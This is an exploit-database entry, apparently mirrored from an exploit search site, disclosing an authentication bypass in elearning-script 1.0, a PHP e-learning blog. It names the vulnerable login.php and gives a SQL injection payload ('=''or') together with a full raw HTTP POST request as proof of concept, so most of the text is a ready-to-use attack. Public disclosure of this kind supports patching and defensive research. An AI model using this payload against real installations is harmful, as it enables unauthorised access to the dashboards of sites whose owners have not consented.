Share
## https://sploitus.com/exploit?id=EDB-ID:47811
# Exploit Title: elearning-script 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-29
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Discription:
# E Learning Blog Developed In Raw PHP
# Vulnerability:  Attacker can bypass login page and access to dashboard page
# vulnerable file : /login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elearning-script-master/login.php

POST /elearning-script-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 445
Referer: http://localhost/elearning-script-master/login.php
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
Connection: close
Upgrade-Insecure-Requests: 1

'=''or'